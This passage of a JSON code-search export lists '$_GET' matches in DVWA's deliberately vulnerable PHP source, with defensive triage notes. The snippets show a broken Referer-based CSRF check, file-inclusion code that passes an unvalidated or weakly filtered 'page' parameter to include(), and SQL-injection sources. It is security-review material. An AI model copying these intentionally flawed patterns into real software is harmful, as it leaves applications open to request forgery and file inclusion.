<span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token 
variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
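  "note": "Line 5: stripos() returns false or a non-negative offset, never -1, so the comparison with -1 is always true and the Referer check never rejects a request. Even with a correct comparison, a substring match on the client-supplied Referer header is not a CSRF defence; use a per-session token."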
 },
 {
  "id": 166,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token 
punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
  "line": 7,
  "start": 2,
  "end": 13,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 167,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_REFERER'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">,</span><span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_NAME'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>!<span class=\"token operator\">=</span><span class=\"token operator\">-</span><span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">6:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">7:</span> \t\t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t\t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 197,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/index.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">29:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">30:</span> }\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> require_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/fi/source/{$vulnerabilityFile}\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"highlight\"><span class=\"line-number\">34:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">count</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span></span>\n<span class=\"line-number\">35:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span>\n<span class=\"line-number\">36:</span> \t<span class=\"token function\">include</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">37:</span> <span class=\"token keyword\">else</span> {\n<span class=\"line-number\">38:</span> \t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'Location:?page=include.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">39:</span> \t<span 
class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 34,
  "start": 29,
  "end": 40,
  "severity": "unknown",
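  "note": "The matched line 34 is commented out and is not itself a finding. The sink is include( $file ) on line 36; $file is presumably set by the per-level source file required on line 32, so triage this entry together with the fi/source entries."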
 },
 {
  "id": 200,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Input validation\n<span class=\"line-number\">7:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">fnmatch</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"file*\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"include.php\"</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> This isn't the page we want!\n<span class=\"line-number\">9:</span> \techo <span class=\"token string\">\"ERROR: File not found!\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
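  "note": "fnmatch() with the pattern file* only constrains the first four characters, so any value that begins with file passes regardless of what follows. If this value reaches include(), replace the pattern with an exact allow-list of filenames."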
 },
 {
  "id": 201,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Only allow include<span class=\"token punctuation\">.</span>php <span class=\"token operator\">or</span> file{<span class=\"token number\">1</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token number\">3</span>}<span class=\"token punctuation\">.</span>php\n<span class=\"line-number\">7:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"include.php\"</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file1.php\"</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file2.php\"</span> <span class=\"token operator\">&amp;</span><span class=\"token 
operator\">&amp;</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file3.php\"</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> This isn't the page we want!\n<span class=\"line-number\">9:</span> \techo <span class=\"token string\">\"ERROR: File not found!\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
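  "note": "Exact-match allow-list of four filenames (include.php, file1.php, file2.php, file3.php), so the request can only select one of these. Candidate for severity ok once the rejecting branch (line 8 onward, cut off here) is confirmed to stop execution."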
 },
 {
  "id": 203,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> ",
  "line": 4,
  "start": 1,
  "end": 8,
  "severity": "unknown",
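  "note": "The page parameter is assigned to $file with no validation in the visible lines (1-7). Any restriction would have to be applied where $file is included."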
 },
 {
  "id": 204,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Input validation\n<span class=\"line-number\">7:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"http://\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"https://\"</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">8:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token 
string\">\"../\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"..\\\"\" ), \"</span>\"<span class=\"token punctuation\">,</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> ",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
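  "note": "The 'page' parameter (line 4) is filtered only by str_replace() deny-lists on lines 7-8. str_replace() makes a single pass over the input, so this is not reliable validation; compare the value against a fixed allowlist of permitted page names instead. How $file is used afterwards is outside this excerpt."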
 },
 {
  "id": 241,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 242,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \n<span 
class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_numeric</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> '<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>id<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
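  "note": "Line 8 takes 'id' straight from the query string, but the lines that follow gate it with is_numeric() and pass it to a prepared statement with the :id placeholder instead of concatenating it into the SQL text. The bind and execute calls are outside this excerpt; confirm the value is bound as an integer."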
 },
 {
  "id": 217,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 218,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \n<span 
class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_numeric</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> '<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>id<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
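  "note": "Line 8 takes 'id' straight from the query string, but the lines that follow gate it with is_numeric() and pass it to a prepared statement with the :id placeholder instead of concatenating it into the SQL text. The bind and execute calls are outside this excerpt; confirm the value is bound as an integer."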
 },
 {
  "id": 222,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span>  <span 